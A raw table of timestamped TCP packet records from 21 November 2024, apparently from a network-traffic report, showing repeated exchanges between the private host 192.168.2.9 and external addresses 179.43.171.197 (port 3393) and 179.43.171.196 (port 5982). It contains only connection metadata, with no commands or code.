                                                                                                                                                              Nov 21, 2024 11:26:57.102767944 CET497143393192.168.2.9179.43.171.197
                                                                                                                                                              Nov 21, 2024 11:26:57.103684902 CET339349714179.43.171.197192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:26:57.103801966 CET339349714179.43.171.197192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:26:57.103846073 CET497143393192.168.2.9179.43.171.197
                                                                                                                                                              Nov 21, 2024 11:26:57.104723930 CET339349714179.43.171.197192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:26:57.104847908 CET339349714179.43.171.197192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:26:57.104902983 CET497143393192.168.2.9179.43.171.197
                                                                                                                                                              Nov 21, 2024 11:26:57.105806112 CET339349714179.43.171.197192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:26:57.105916977 CET339349714179.43.171.197192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:26:57.106369019 CET497143393192.168.2.9179.43.171.197
                                                                                                                                                              Nov 21, 2024 11:26:57.106884956 CET339349714179.43.171.197192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:26:57.106947899 CET339349714179.43.171.197192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:26:57.107145071 CET497143393192.168.2.9179.43.171.197
                                                                                                                                                              Nov 21, 2024 11:26:57.107927084 CET339349714179.43.171.197192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:26:57.108030081 CET339349714179.43.171.197192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:26:57.108139992 CET497143393192.168.2.9179.43.171.197
                                                                                                                                                              Nov 21, 2024 11:26:57.108999968 CET339349714179.43.171.197192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:26:57.109061003 CET339349714179.43.171.197192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:26:57.109132051 CET497143393192.168.2.9179.43.171.197
                                                                                                                                                              Nov 21, 2024 11:26:57.110075951 CET339349714179.43.171.197192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:26:57.110882044 CET339349714179.43.171.197192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:26:57.110934019 CET497143393192.168.2.9179.43.171.197
                                                                                                                                                              Nov 21, 2024 11:26:57.111113071 CET339349714179.43.171.197192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:26:57.111227989 CET339349714179.43.171.197192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:26:57.111268997 CET497143393192.168.2.9179.43.171.197
                                                                                                                                                              Nov 21, 2024 11:26:57.112159967 CET339349714179.43.171.197192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:26:57.112241030 CET339349714179.43.171.197192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:26:57.112274885 CET497143393192.168.2.9179.43.171.197
                                                                                                                                                              Nov 21, 2024 11:26:57.113251925 CET339349714179.43.171.197192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:26:57.113370895 CET339349714179.43.171.197192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:26:57.113554955 CET497143393192.168.2.9179.43.171.197
                                                                                                                                                              Nov 21, 2024 11:26:57.114377975 CET339349714179.43.171.197192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:26:57.114396095 CET339349714179.43.171.197192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:26:57.114406109 CET339349715179.43.171.197192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:26:57.114424944 CET339349715179.43.171.197192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:26:57.114455938 CET497143393192.168.2.9179.43.171.197
                                                                                                                                                              Nov 21, 2024 11:26:57.114494085 CET497153393192.168.2.9179.43.171.197
                                                                                                                                                              Nov 21, 2024 11:26:57.114947081 CET339349715179.43.171.197192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:26:57.115057945 CET339349715179.43.171.197192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:26:57.115098953 CET497153393192.168.2.9179.43.171.197
                                                                                                                                                              Nov 21, 2024 11:26:57.115434885 CET339349714179.43.171.197192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:26:57.115550995 CET339349714179.43.171.197192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:26:57.115592003 CET497143393192.168.2.9179.43.171.197
                                                                                                                                                              Nov 21, 2024 11:26:57.116187096 CET339349715179.43.171.197192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:26:57.116318941 CET339349715179.43.171.197192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:05.374070883 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:05.377259970 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:05.377392054 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:05.377443075 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:05.380877972 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:05.380902052 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:05.380947113 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:05.384274960 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:05.384418011 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:05.384552002 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:05.387763977 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:05.387871981 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:05.387916088 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:05.391380072 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:05.391501904 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:05.391593933 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:05.419661999 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:05.419735909 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:05.419802904 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:05.421436071 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:05.421554089 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:05.421603918 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:05.426372051 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:05.469724894 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:05.478637934 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:05.478754997 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:05.478823900 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:05.480427027 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:05.480532885 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:05.480577946 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:05.484878063 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:05.491878986 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:05.491942883 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:05.492002964 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:05.493594885 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:05.493678093 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:05.493689060 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:05.497104883 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:05.497209072 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:05.497226000 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:05.500590086 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:05.500658989 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:05.500674963 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:05.507205963 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:05.507220030 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:05.507253885 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:05.508444071 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:05.508574963 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:05.508610964 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:05.511564970 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:05.511719942 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:05.511898994 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:05.514745951 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:05.514786959 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:05.514944077 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:05.518017054 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:05.518029928 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:05.518057108 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:05.520925045 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:05.520939112 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:05.520989895 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:05.523797989 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:05.523812056 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:05.523854017 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:05.526809931 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:05.526876926 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:05.526973963 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:05.529690027 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:05.529833078 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:05.529860973 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:05.532737970 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:05.532821894 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:05.532897949 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:05.535562992 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:05.535871983 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:05.535945892 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:05.538574934 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:05.538620949 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:05.538759947 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:05.541567087 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:05.541579962 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:05.541647911 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:05.543488026 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:05.543545961 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:05.543584108 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:05.547883987 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:05.547898054 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:05.547941923 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:05.549498081 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:05.549658060 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:05.549710989 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:05.551384926 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:05.551398993 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:05.551433086 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:05.553320885 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:05.553494930 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:05.553520918 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:05.555300951 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:05.555321932 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:05.555366039 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:05.557214022 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:05.557226896 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:05.557264090 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:05.610347986 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:05.671379089 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:05.671545982 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:05.671597004 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:05.672017097 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:05.672179937 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:05.672225952 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:05.674088001 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:05.674237967 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:05.674283028 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:05.675909042 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:05.676067114 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:05.676110029 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:05.677819014 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:05.677956104 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:05.677998066 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:05.679657936 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:05.685039997 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:05.685082912 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:05.685200930 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:05.883179903 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:05.884505987 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:05.884639978 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:05.884749889 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:05.884836912 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:05.886136055 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:05.886248112 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:05.886336088 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:05.887641907 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:05.887764931 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:05.887810946 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:05.889185905 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:05.889305115 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:05.889348030 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:05.890729904 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:05.890841961 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:05.890885115 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:05.892263889 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:05.892445087 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:05.892848015 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:05.893764973 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:05.893965006 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:05.894156933 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:05.895303965 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:05.895410061 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:05.895453930 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:05.896850109 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:05.896945000 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:05.897053957 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:05.898381948 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:05.898478031 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:05.899921894 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:05.899979115 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:05.899997950 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:05.900043011 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:05.901417017 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:05.901544094 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:05.901598930 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:05.902951956 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:05.903022051 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:05.903062105 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:05.904478073 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:05.904548883 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:05.904596090 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:05.906012058 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:05.906122923 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:05.906164885 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:05.907555103 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:05.907594919 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:05.907640934 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:05.909111977 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:05.909178972 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:05.909230947 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:05.910628080 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:05.910725117 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:05.910768986 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:05.912136078 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:05.912200928 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:05.912252903 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:05.913675070 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:05.913784981 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:05.913829088 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:05.915204048 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:05.915304899 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:05.915355921 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:05.916733027 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:05.916810036 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:05.916857958 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:05.918314934 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:05.918436050 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:05.918493986 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:05.919831991 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:05.919946909 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:05.919997931 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:05.921305895 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:05.921428919 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:05.921475887 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:05.922858953 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:05.923032999 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:05.923089027 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:05.924446106 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:05.924484968 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:05.924568892 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:05.925916910 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:05.926023006 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:05.926073074 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:05.927439928 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:05.927537918 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:05.927603006 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:05.929016113 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:05.929116964 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:05.929169893 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:05.930566072 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:05.930598021 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:05.930644035 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:05.932019949 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:05.932152033 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:05.932200909 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:05.933568954 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:05.933670044 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:05.933717012 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:05.935096025 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:05.935184002 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:05.935236931 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:05.936649084 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:05.936768055 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:05.936850071 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:05.938148975 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:05.938270092 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:05.938345909 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:05.939699888 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:05.939752102 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:05.939800978 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:05.941272020 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:05.941385031 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:05.941484928 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:05.942761898 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:05.942819118 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:05.942872047 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:06.182013035 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.182034969 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.182091951 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:06.229286909 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.303354979 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:06.303366899 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.303378105 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:06.303380013 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.303391933 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.303405046 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.303406954 CET497185982192.168.2.9179.43.171.196
                                                                                                                                                              Nov 21, 2024 11:27:06.303419113 CET598249718179.43.171.196192.168.2.9
                                                                                                                                                              Nov 21, 2024 11:27:06.303431988 CET598249718179.43.171.196192.168.2.9
